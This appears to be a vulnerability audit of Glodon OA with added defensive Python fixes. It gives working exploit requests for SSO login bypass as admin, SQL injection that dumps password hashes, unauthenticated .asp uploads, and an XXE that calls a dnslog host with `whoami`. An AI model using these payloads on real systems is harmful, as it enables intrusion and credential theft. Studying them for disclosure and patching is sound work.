0x01 Vulnerability analysis
Arbitrary user login
/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx
Locate GetSSOStamp.DLL. Its GetStamp method takes a usercode parameter and hands back an SSO stamp for whatever user code is supplied; the request below asks for one for admin.
POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx HTTP/1.1
Host: x
Content-Type: text/xml; charset=utf-8
Content-Length: 355
SOAPAction: "http://tempuri.org/GetStamp"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetStamp xmlns="http://tempuri.org/">
<usercode>admin</usercode>
</GetStamp>
</soap:Body>
</soap:Envelope>
Login endpoint. The values returned by GetStamp are then passed to the login endpoint as LoginCredence and LoginTimestamp:
/Services/Identification/Server/login.ashx?sso=1&ssoProvider=WorkflowSSO&LoginFlag=custom&UserCode=admin&LoginCredence=856F1154F61FE89FDE236B64F565502C&LoginTimestamp=758027442&service=http://xxxxxx/Portal/Frame/layoutA/Default.aspx
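The handoff above fails because the stamp is minted for anyone who names a user code, and the login endpoint then trusts it. The Python below is an added example, not code from the original article or from the product, sketching the shape such a handoff needs to have to be safe: the stamp is only issued to a caller that proves possession of the SSO shared secret, LoginCredence is an HMAC bound to UserCode and LoginTimestamp (plus a nonce), and the login side enforces a short validity window and single use. The secret value, the 300-second window, the nonce, and the function names (issue_stamp, StampVerifier.verify_login, source_system_proof) are assumptions for illustration; the product's real stamp algorithm is not shown on the page.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Assumed shared secret between the SSO provider and the OA login endpoint
# (constructed for this example; in practice loaded from protected config).
SSO_SHARED_SECRET = b"example-shared-secret-rotate-me"
STAMP_TTL_SECONDS = 300  # assumed validity window for a stamp


def _mac(secret: bytes, *parts: str) -> str:
    return hmac.new(secret, "|".join(parts).encode(), hashlib.sha256).hexdigest()


def source_system_proof(usercode: str, secret: bytes = SSO_SHARED_SECRET) -> str:
    """What the trusted upstream system attaches to its GetStamp call.

    Only a holder of the shared secret can compute it, so an anonymous client
    that merely knows a user code cannot have a stamp issued for that user.
    """
    return _mac(secret, "issue", usercode)


def issue_stamp(usercode: str, caller_proof: str, now: Optional[int] = None,
                secret: bytes = SSO_SHARED_SECRET) -> Optional[dict]:
    """GetStamp replacement: refuse unless the caller proves it holds the secret."""
    if not hmac.compare_digest(source_system_proof(usercode, secret), caller_proof):
        return None
    ts = int(time.time()) if now is None else now
    nonce = secrets.token_hex(8)
    return {
        "UserCode": usercode,
        "LoginTimestamp": ts,
        "Nonce": nonce,
        # LoginCredence binds user code, time and nonce: a stamp minted for
        # 'guest' cannot be resubmitted with UserCode=admin.
        "LoginCredence": _mac(secret, "login", usercode, str(ts), nonce),
    }


class StampVerifier:
    """login.ashx side: check the MAC, freshness and single use of a stamp."""

    def __init__(self, secret: bytes = SSO_SHARED_SECRET, ttl: int = STAMP_TTL_SECONDS):
        self._secret = secret
        self._ttl = ttl
        self._used = set()  # replay cache keyed by credence; a real deployment expires entries

    def verify_login(self, usercode: str, credence: str, timestamp: int, nonce: str,
                     now: Optional[int] = None) -> bool:
        now = int(time.time()) if now is None else now
        if not 0 <= now - timestamp <= self._ttl:
            return False  # stale, or timestamp from the future
        expected = _mac(self._secret, "login", usercode, str(timestamp), nonce)
        if not hmac.compare_digest(expected, credence):
            return False  # forged, or issued for a different user
        if credence in self._used:
            return False  # replay of a stamp that already logged someone in
        self._used.add(credence)
        return True
```

The point of the MAC is not secrecy of the credence but binding: the login endpoint must be unable to accept a credence for a UserCode other than the one it was minted for, and must refuse it after it has been used once or after the window has passed. Fixing the stamp format without also authenticating the GetStamp caller would still leave the original bug.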
SQL injection
/Webservice/IM/Config/ConfigService.asmx
ConfigService inherits directly from WebService, and it is easy to see that no permission check is in place. The GetIMDictionary method passes its key into ConfigService.getIMDictValue, which concatenates it straight into the SQL statement.
POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1
Host: x
Content-Length: 428
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Content-Type: text/xml; charset=utf-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://180.140.115.138:91/Webservice/IM/Config/ConfigService.asmx?op=GetIMDictionary
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetIMDictionary xmlns="http://tempuri.org/">
<key>1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --</key>
</GetIMDictionary>
</soap:Body>
</soap:Envelope>
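To make the concatenation concrete, here is an added example (not code from the page or from the product) that reproduces the vulnerable pattern and its parameterised fix against a constructed in-memory SQLite database. The table and column names T_ORG_USER, F_CODE and F_PWD_MD5 come from the payload above; the dictionary table T_IM_DICT, its columns, and the sample rows are assumptions. The payload is the page's, adapted to SQLite syntax (no TOP, || in place of concat()).

```python
import sqlite3
from typing import List

# Constructed stand-in for the product's schema; only the names used in the
# page's payload (T_ORG_USER, F_CODE, F_PWD_MD5) are taken from the article.
def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE T_IM_DICT (F_KEY TEXT, F_VALUE TEXT);
        INSERT INTO T_IM_DICT VALUES ('1', 'IM server address');
        CREATE TABLE T_ORG_USER (F_CODE TEXT, F_PWD_MD5 TEXT);
        INSERT INTO T_ORG_USER VALUES ('admin', '21232f297a57a5a743894a0e4a801fc3');
        INSERT INTO T_ORG_USER VALUES ('guest', '084e0343a1d4e4e2ff5e95e2eeaa8e0b');
    """)
    return con


def get_im_dict_value_vulnerable(con: sqlite3.Connection, key: str) -> List[str]:
    """Mirrors the pattern the page describes: the key is concatenated into the SQL text."""
    sql = "SELECT F_VALUE FROM T_IM_DICT WHERE F_KEY = '" + key + "'"
    return [row[0] for row in con.execute(sql)]


def get_im_dict_value_fixed(con: sqlite3.Connection, key: str) -> List[str]:
    """Parameterised: the key is bound as a value and is never parsed as SQL."""
    return [row[0] for row in
            con.execute("SELECT F_VALUE FROM T_IM_DICT WHERE F_KEY = ?", (key,))]


# The page's payload adapted to SQLite: closes the quoted literal, appends a
# UNION that reads every user's code:hash pair, and comments out the trailing quote.
PAYLOAD = "1' UNION ALL SELECT F_CODE || ':' || F_PWD_MD5 FROM T_ORG_USER --"
```

Run against the vulnerable function, PAYLOAD returns the legitimate dictionary row followed by one admin:hash row per user; against the fixed function it returns nothing, because no F_KEY equals that literal string. In the product's ASP.NET code the equivalent fix is a SqlParameter on the SqlCommand rather than string concatenation, and the web method additionally needs the authorization check the page notes is absent.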
Unauthenticated (front-end) arbitrary file upload
Step one: obtain a key
In GetAuthorizeKey.ashx, when the supplied cmd is neither queryUplaodResult nor checkFileExists, control enters ProcessGetAuthorizeKey, which requires the two parameters destDir and destFilename.
POST /Services/FileService/UserFiles/GetAuthorizeKey.ashx HTTP/1.1
Host: x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
cmd=&destDir=./sysinfo/&destFilename=qrxyrgwa.asp
Step two: upload
The three parameters (the key obtained in step one, destDir and destFilename) are sent together with the file, and the file is created at that destination.
POST /Services/FileService/UserFiles/UserFilesUpload.ashx HTTP/1.1
Host: x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Length: 555
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="key"
f3c7e655-9ecf-4e81-a7c1-da2e1172ff7b
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="destDir"
./sysinfo/
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="destFilename"
qrxyrgwa.asp
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="file";filename="qrxyrgwa.asp"
content-type:image/png
<% response.write("qrxyrgwa")%>
------WebKitFormBoundarytCOFhbEjc3IfYaY5--
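The two-step flow above shows three missing controls: GetAuthorizeKey is reachable without a session, destDir/destFilename are accepted as given (an .asp under the web root), and the key does not pin the destination that was vetted when it was issued. The following Python is an added example, not code from the page or from the product, of how the two handlers could validate the destination and bind the key to it. The upload root, the allowlists of directories and extensions, and the function names are assumptions for illustration.

```python
import posixpath
import secrets
from typing import Dict, Optional, Tuple

UPLOAD_ROOT = "/var/www/oa/UserFiles"          # assumed physical upload root
ALLOWED_DIRS = {"avatars", "attachments"}       # assumed allowlist of writable subdirectories
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".docx", ".xlsx"}  # assumed


class UploadRejected(ValueError):
    pass


def safe_destination(dest_dir: str, dest_filename: str) -> str:
    """Return the vetted path relative to UPLOAD_ROOT, or raise UploadRejected.

    Server-side scripts are stopped by the extension allowlist plus a strict
    filename stem (letters, digits, '-' and '_' only, so no second '.', no ';'
    and no separators); traversal is stopped by normalising dest_dir and
    checking the result against a directory allowlist.
    """
    joined = dest_dir + dest_filename
    if "\\" in joined or "\x00" in joined:
        raise UploadRejected("backslash or NUL in path")
    stem, ext = posixpath.splitext(dest_filename)
    if not stem or not all(c.isalnum() or c in "-_" for c in stem):
        raise UploadRejected(f"filename stem {stem!r} not allowed")
    if ext.lower() not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # "./sysinfo/", "a/../b/", "../../" all collapse to one clean relative dir
    rel_dir = posixpath.normpath("/" + dest_dir).lstrip("/")
    if rel_dir not in ALLOWED_DIRS:
        raise UploadRejected(f"directory {dest_dir!r} not allowed")
    return posixpath.join(rel_dir, stem + ext.lower())


def destination_allowed(dest_dir: str, dest_filename: str) -> bool:
    try:
        safe_destination(dest_dir, dest_filename)
        return True
    except UploadRejected:
        return False


_issued_keys: Dict[str, Tuple[str, str]] = {}  # key -> (owner, vetted relative path)


def get_authorize_key(user: Optional[str], dest_dir: str, dest_filename: str) -> str:
    """GetAuthorizeKey replacement: needs a logged-in user and binds the key to one destination."""
    if not user:
        raise UploadRejected("authentication required")
    rel = safe_destination(dest_dir, dest_filename)
    key = secrets.token_urlsafe(24)
    _issued_keys[key] = (user, rel)
    return key


def key_is_live(key: str) -> bool:
    return key in _issued_keys


def user_files_upload(user: Optional[str], key: str, dest_dir: str, dest_filename: str,
                      part_filename: str) -> str:
    """UserFilesUpload replacement: returns the absolute path the handler may write to.

    The key is single use, must belong to the same user, and must have been
    issued for exactly this destination, so the destDir/destFilename resent in
    step two cannot differ from what was vetted in step one.
    """
    entry = _issued_keys.pop(key, None)  # consumed whether or not the rest passes
    if entry is None:
        raise UploadRejected("unknown or already used key")
    owner, rel = entry
    if owner != user:
        raise UploadRejected("key belongs to another user")
    if safe_destination(dest_dir, dest_filename) != rel:
        raise UploadRejected("key was issued for a different destination")
    if posixpath.basename(part_filename.replace("\\", "/")) != dest_filename:
        raise UploadRejected("multipart filename does not match destFilename")
    return posixpath.join(UPLOAD_ROOT, rel)
```

The actual write is left to the caller; what matters is that the path it receives was derived from allowlisted components rather than from the request. Against the page's values, ./sysinfo/ and qrxyrgwa.asp are rejected on the extension before the directory is even looked at.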
Kinggrid (金格) file upload
/GB/LK/Common/ashx/WebRevisionAjax.ashx
The body uses Kinggrid's DBSTEP V3.0 format: a header line, then base64-encoded fields (OPTION=U0FWRUZJTEU= decodes to SAVEFILE, FILENAME=MS5hc3A= to 1.asp), followed by the file content.
POST /GB/LK/Common/ashx/WebRevisionAjax.ashx HTTP/1.1
Host: xxxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
DBSTEP V3.0 170 0 1000
DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
TableKey=MTExMTE=
FILENAME=MS5hc3A=
123456
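Because the interesting fields are base64-encoded, a WAF rule or a log review that looks for ".asp" in the raw body will miss this request. The decoder below is an added example (not code from the page or from Kinggrid) that splits a DBSTEP body into header, decoded fields and payload and flags a SAVEFILE whose FILENAME would place a server-side script. The layout it assumes (header line, key=base64 lines, then raw content) is inferred from the request above; the three numbers in the header are not interpreted, and the extension list is an assumption.

```python
import base64
import posixpath
from typing import Dict, Tuple

# Constructed sample: the body of the request above, with CRLF line endings.
SAMPLE_DBSTEP = (b"DBSTEP V3.0 170 0 1000\r\n"
                 b"DBSTEP=REJTVEVQ\r\n"
                 b"OPTION=U0FWRUZJTEU=\r\n"
                 b"TableKey=MTExMTE=\r\n"
                 b"FILENAME=MS5hc3A=\r\n"
                 b"123456")

# Extensions a document-save call must never write on an IIS host (assumed list).
SERVER_EXECUTABLE = {".asp", ".aspx", ".ashx", ".asmx", ".asa", ".cer", ".soap", ".config"}


def parse_dbstep(body: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a DBSTEP V3.0 body into (header line, decoded fields, file payload).

    The field block ends at the first line that is not key=<valid base64>;
    everything from there on, minus one leading line break, is the payload.
    """
    lines = body.splitlines(keepends=True)
    if not lines or not lines[0].startswith(b"DBSTEP V3.0"):
        raise ValueError("not a DBSTEP V3.0 body")
    header = lines[0].decode("latin-1").strip()
    fields: Dict[str, str] = {}
    i = 1
    while i < len(lines):
        key, sep, value = lines[i].strip().partition(b"=")
        if not sep or not key.replace(b"_", b"").isalnum():
            break
        try:
            fields[key.decode("ascii")] = base64.b64decode(value, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break  # first non-field line: payload starts here
        i += 1
    payload = b"".join(lines[i:])
    if payload.startswith(b"\r\n"):
        payload = payload[2:]
    elif payload.startswith(b"\n"):
        payload = payload[1:]
    return header, fields, payload


def is_server_side_write(fields: Dict[str, str]) -> bool:
    """Flag a SAVEFILE whose FILENAME would land a script on the server or escape its directory."""
    if fields.get("OPTION", "").upper() != "SAVEFILE":
        return False
    name = fields.get("FILENAME", "")
    ext = posixpath.splitext(name.lower())[1]
    return ext in SERVER_EXECUTABLE or "/" in name or "\\" in name or ".." in name
```

The same decoder is what a server-side fix needs before deciding anything about FILENAME: the decision has to be made on the decoded name, and SAVEFILE should be restricted to the document extensions the revision feature actually handles.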
XXE
/GB/LK/Document/DataExchange/DataExchange.ashx
With SystemName=BIM the handler proceeds to the next step, where the Params field is parsed as XML: an obvious XXE. The request below declares an external entity pointing at a DNS-logging host to confirm the bug out of band.
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Sec-Purpose: prefetch;prerender
Purpose: prefetch
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Length: 405
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"
BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://`whoami`.mw8goc.dnslog.cn/">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
Originally published on the WeChat official account 小黑说安全: 1day | 广联达OA (Glodon OA) system audit
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site bears no legal or joint liability whatsoever. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).